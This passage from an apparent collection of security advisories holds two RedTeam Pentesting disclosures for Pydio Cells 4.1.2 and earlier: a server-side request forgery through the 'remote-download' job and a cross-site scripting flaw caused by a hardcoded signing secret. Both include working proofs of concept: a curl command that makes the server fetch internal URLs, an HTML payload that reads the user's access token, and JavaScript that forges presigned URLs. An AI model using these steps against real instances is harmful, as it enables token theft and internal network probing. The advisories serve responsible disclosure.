https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Fabian Densborn / @2023 </code></pre>

<pre><code>For longer running processes, Pydio Cells allows for the creation of jobs, which are run in the background. The job "remote-download" can be used to cause the backend to send a HTTP GET request to a specified URL and save the response to a new file. The response file is then available in a user-specified folder in Pydio Cells. Details ======= Product: Pydio Cells Affected Versions: 4.1.2 and earlier versions Fixed Versions: 4.2.0, 4.1.3, 3.0.12 Vulnerability Type: Server-Side Request Forgery Security Risk: medium Vendor URL: https://pydio.com/ Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-005 Advisory Status: published CVE: CVE-2023-32750 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32750 Introduction ============ "Pydio Cells is an open-core, self-hosted Document Sharing and Collaboration platform (DSC) specifically designed for organizations that need advanced document sharing and collaboration without security trade-offs or compliance issues." (from the vendor's homepage) More Details ============ Using the REST-API of Pydio Cells it is possible to start jobs. For example, when renaming a file or folder an HTTP request similar to the following is sent: ------------------------------------------------------------------------ PUT /a/jobs/user/move HTTP/2 Host: example.com User-Agent: agent Accept: application/json Authorization: Bearer G4ZRN[...] Content-Type: application/json Content-Length: 140 { "JobName": "move", "JsonParameters": "{\"nodes\":[\"cell/file.txt\"],\"target\":\"cell/renamed.txt\",\"targetParent\":false}" } ------------------------------------------------------------------------ The body contains a JSON object with a job name and additional parameters for the job. Besides the "move" job, also a job with the name "remote-download" exists. It takes two additional parameters: "urls" and "target". In the "urls" parameter, a list of URLs can be specified and in the parameter "target" a path can be specified in which to save the response. When the job is started, HTTP GET requests are sent from the Pydio Cells server to the specified URLs. The responses are saved into a file, which are uploaded to the specified folder within Pydio Cells. Potential errors are transmitted in a WebSocket channel, which can be opened through the "/ws/event" endpoint. Proof of Concept ================ Log into Pydio Cells and retrieve the JWT from the HTTP requests. Then, run the following commands to start a "remote-download" job to trigger an HTTP request: ------------------------------------------------------------------------ $ export JWT="<insert JWT here>" $ echo '{"urls": ["http://localhost:8000/internal.html"], "target": "personal-files"}' \ | jq '{"JobName": "remote-download", "JsonParameters": (. | tostring)}' \ | tee remote-download.json $ curl --header "Authorization: Bearer $JWT" \ --header 'Content-Type: application/json' \ --request PUT \ --data @remote-download.json 'https://example.com/a/jobs/user/remote-download' ------------------------------------------------------------------------ The URL in the JSON document specifies which URL to request. The "target" field in the same document specifies into which folder the response is saved. Afterwards, the response is contained in a file in the specified folder. Potential errors are communicated through the WebSocket channel. Workaround ========== Limit the services which can be reached by the Pydio Cells server, for example using an outbound firewall. Fix === Upgrade Pydio Cells to a version without the vulnerability. Security Risk ============= The risk is highly dependent on the environment in which the attacked Pydio Cells instance runs. If there are any internal HTTP services which expose sensitive data on the same machine or within the same network, the server-side request forgery vulnerability could pose a significant risk. In other circumstances, the risk could be negligible. Therefore, overall the vulnerability is rated as a medium risk. Timeline ======== 2023-03-23 Vulnerability identified 2023-05-02 Customer approved disclosure to vendor 2023-05-02 Vendor notified 2023-05-03 CVE ID requested 2023-05-08 Vendor released fixed version 2023-05-14 CVE ID assigned 2023-05-16 Vendor asks for a few more days before the advisory is released 2023-05-30 Advisory released References ========== RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen </code></pre>

<pre><code>Advisory: Pydio Cells: Cross-Site Scripting via File Download Pydio Cells implements the download of files using presigned URLs which are generated using the Amazon AWS SDK for JavaScript [1]. The secrets used to sign these URLs are hardcoded and exposed through the JavaScript files of the web application. Therefore, it is possible to generate valid signatures for arbitrary download URLs. By uploading an HTML file and modifying the download URL to serve the file inline instead of as an attachment, any included JavaScript code is executed when the URL is opened in a browser, leading to a cross-site scripting vulnerability. Details ======= Product: Pydio Cells Affected Versions: 4.1.2 and earlier versions Fixed Versions: 4.2.0, 4.1.3, 3.0.12 Vulnerability Type: Cross-Site Scripting Security Risk: high Vendor URL: https://pydio.com/ Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-004 Advisory Status: published CVE: CVE-2023-32751 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32751 Introduction ============ "Pydio Cells is an open-core, self-hosted Document Sharing and Collaboration platform (DSC) specifically designed for organizations that need advanced document sharing and collaboration without security trade-offs or compliance issues." (from the vendor's homepage) More Details ============ When a file named "xss.html" is downloaded in the Pydio Cells web application, a download URL similar to the following is generated: https://example.com/io/xss/xss.html ?AWSAccessKeyId=gateway &Expires=1682495748 &Signature=920JV0Zy%2BrNYXjak7xksAxRpRp8%3D &response-content-disposition=attachment%3B%20filename%3Dxss.html &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...] The URL is akin to a presigned URL as used by the Amazon S3 service. It contains the URL parameter "response-content-disposition" which is set to "attachment" causing the response to contain a "Content-Disposition" header with that value. Therefore, the browser downloads the file instead of interpreting it. The URL also contains a signature and expiry timestamp, which are checked by the backend. Unlike a presigned URL as used by S3, the URL also contains the parameter "pydio_jwt" with the JWT of the user for authentication. Furthermore, the access key with the ID "gateway" is referenced, which can be found in the JavaScript sources of Pydio Cells together with the secret: ------------------------------------------------------------------------ _awsSdk.default.config.update({ accessKeyId: 'gateway', secretAccessKey: 'gatewaysecret', s3ForcePathStyle: !0, httpOptions: { timeout: PydioApi.getMultipartUploadTimeout() } }); ------------------------------------------------------------------------ With this information it is possible to change the URL parameter "response-content-disposition" to the value "inline" and then calculate a valid signature for the resulting URL. Furthermore, the content type of the response can be changed to "text/html" by also adding the URL parameter "response-content-type" with that value. This would result in a URL like the following for the previously shown example URL: https://example.com/io/xss/xss.html? AWSAccessKeyId=gateway &Expires=1682495668 &Signature=HpKue0YQZrnp%2B665Jf1t7ONgfRg%3D &response-content-disposition=inline &response-content-type=text%2Fhtml &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...] Upon opening the URL in a browser, the HTML included in the file is interpreted and any JavaScript code is run. Proof of Concept ================ Upload a HTML file into an arbitrary location of a Pydio Cells instance. For example with the following contents: ------------------------------------------------------------------------ <html> <body> <h1>Cross-Site Scriping</h1> <script> let token = JSON.parse(localStorage.token4).AccessToken; alert(token); </script> </body> </html> ------------------------------------------------------------------------ The contained JavaScript code reads the JWT access token for Pydio Cells from the browser's local storage object and opens a message box. Instead of just displaying the JWT, it could also be sent to an attacker. The following JavaScript function can then be run within the browser's developer console to generate a presigned URL for the HTML file: ------------------------------------------------------------------------ async function getPresignedURL(path) { let client = PydioApi.getClient(); let node = new AjxpNode(path); let metadata = {Bucket: "io", ResponseContentDisposition: "inline", Key: path, ResponseContentType: "text/html"}; let url = await client.buildPresignedGetUrl(node, null, "text/html", metadata); return url; } await getPresignedURL("xss/xss.html"); ------------------------------------------------------------------------ The code has to be run in context of Pydio Cells while being logged in. If the resulting URL is opened in a browser, the JavaScript code contained in the HTML file is run. If the attack is conducted in the described way, the JWT of the attacker is exposed through the URL. However, this can be circumvented by first generating a public URL for the file and then constructing the presigned URL based on the resulting download URL. Workaround ========== No workaround known. Fix === Upgrade Pydio Cells to a version without the vulnerability. Security Risk ============= Attackers that can upload files to a Pydio Cells instance can construct URLs that execute arbitrary JavaScript code in context of Pydio Cells upon opening. This could for example be used to steal the authentication tokens of users opening the URL. It is likely that such an attack succeeds, since sharing URLs to files hosted using Pydio Cells is a common use case of the application. Therefore, the vulnerability is estimated to pose a high risk. Timeline ======== 2023-03-23 Vulnerability identified 2023-05-02 Customer approved disclosure to vendor 2023-05-02 Vendor notified 2023-05-03 CVE ID requested 2023-05-08 Vendor released fixed version 2023-05-14 CVE ID assigned 2023-05-16 Vendor asks for a few more days before the advisory is released 2023-05-30 Advisory released References ========== [1] https://aws.amazon.com/sdk-for-javascript/ RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen </code></pre>